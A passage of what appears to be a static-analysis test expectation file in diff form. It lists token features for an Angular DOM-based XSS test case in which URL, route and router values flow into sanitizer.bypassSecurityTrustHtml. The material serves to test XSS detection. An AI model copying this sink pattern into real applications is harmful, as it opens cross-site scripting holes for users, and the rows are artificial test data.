autogenerated/Xss/DomBasedXss/angular2-client.ts:22:5:22:18 | this.sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:5:22:42 | this.sa ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:5:22:42 | this.sa ... ustHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:5:22:42 | this.sa ... ustHtml | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:5:22:42 | this.sa ... ustHtml | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:5:22:42 | this.sa ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:5:22:72 | exceptional return of this.sa ... ).href) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:5:22:72 | exceptional return of this.sa ... ).href) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:5:22:72 | exceptional return of this.sa ... ).href) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:5:22:72 | exceptional return of this.sa ... ).href) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:5:22:72 | exceptional return of this.sa ... ).href) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:5:22:72 | this.sa ... ).href) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:5:22:72 | this.sa ... ).href) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:5:22:72 | this.sa ... ).href) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:5:22:72 | this.sa ... ).href) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:5:22:72 | this.sa ... ).href) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:10:22:18 | sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:10:22:18 | sanitizer | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:10:22:18 | sanitizer | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:10:22:18 | sanitizer | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:10:22:18 | sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:20:22:42 | bypassS ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:20:22:42 | bypassS ... ustHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:20:22:42 | bypassS ... ustHtml | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:20:22:42 | bypassS ... ustHtml | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:20:22:42 | bypassS ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:50 | \\u0275getDOM | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:50 | \\u0275getDOM | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:50 | \\u0275getDOM | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:50 | \\u0275getDOM | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:50 | \\u0275getDOM | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:52 | \\u0275getDOM() | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:52 | \\u0275getDOM() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:52 | \\u0275getDOM() | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:52 | \\u0275getDOM() | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:52 | \\u0275getDOM() | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:52 | exceptional return of \\u0275getDOM() | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:52 | exceptional return of \\u0275getDOM() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:52 | exceptional return of \\u0275getDOM() | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:52 | exceptional return of \\u0275getDOM() | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:52 | exceptional return of \\u0275getDOM() | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:64 | \\u0275getDOM ... ocation | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:64 | \\u0275getDOM ... ocation | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:64 | \\u0275getDOM ... ocation | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:64 | \\u0275getDOM ... ocation | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:64 | \\u0275getDOM ... ocation | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:66 | \\u0275getDOM ... ation() | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:66 | \\u0275getDOM ... ation() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:66 | \\u0275getDOM ... ation() | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:66 | \\u0275getDOM ... ation() | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:66 | \\u0275getDOM ... ation() | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:66 | exceptional return of \\u0275getDOM ... ation() | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:66 | exceptional return of \\u0275getDOM ... ation() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:66 | exceptional return of \\u0275getDOM ... ation() | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:66 | exceptional return of \\u0275getDOM ... ation() | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:66 | exceptional return of \\u0275getDOM ... ation() | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | | autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:71 | \\u0275getDOM ... ().href | CalleeFlexibleAccessPath | this.sanitizer.bypassSecurityTrustHtml | | autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:71 | \\u0275getDOM ... ().href | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:71 | \\u0275getDOM ... ().href | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | @@ -11949,6 +90732,71 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:71 | \\u0275getDOM ... ().href | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | | autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:71 | \\u0275getDOM ... ().href | enclosingFunctionName | ngOnInit | | autogenerated/Xss/DomBasedXss/angular2-client.ts:22:44:22:71 | \\u0275getDOM ... ().href | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:54:22:64 | getLocation | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:54:22:64 | getLocation | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:54:22:64 | getLocation | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:54:22:64 | getLocation | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:54:22:64 | getLocation | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:68:22:71 | href | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:68:22:71 | href | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:68:22:71 | href | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:68:22:71 | href | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:22:68:22:71 | href | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:5:24:8 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:5:24:8 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:5:24:8 | this | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:5:24:8 | this | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:5:24:8 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:5:24:18 | this.sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:5:24:18 | this.sanitizer | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:5:24:18 | this.sanitizer | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:5:24:18 | this.sanitizer | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:5:24:18 | this.sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:5:24:42 | this.sa ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:5:24:42 | this.sa ... ustHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:5:24:42 | this.sa ... ustHtml | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:5:24:42 | this.sa ... ustHtml | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:5:24:42 | this.sa ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:5:24:74 | exceptional return of this.sa ... ms.foo) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:5:24:74 | exceptional return of this.sa ... ms.foo) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:5:24:74 | exceptional return of this.sa ... ms.foo) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:5:24:74 | exceptional return of this.sa ... ms.foo) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:5:24:74 | exceptional return of this.sa ... ms.foo) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:5:24:74 | this.sa ... ms.foo) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:5:24:74 | this.sa ... ms.foo) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:5:24:74 | this.sa ... ms.foo) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:5:24:74 | this.sa ... ms.foo) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:5:24:74 | this.sa ... ms.foo) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:10:24:18 | sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:24:10:24:18 | sanitizer | contextSurroundingFunctionParameters | () | +| 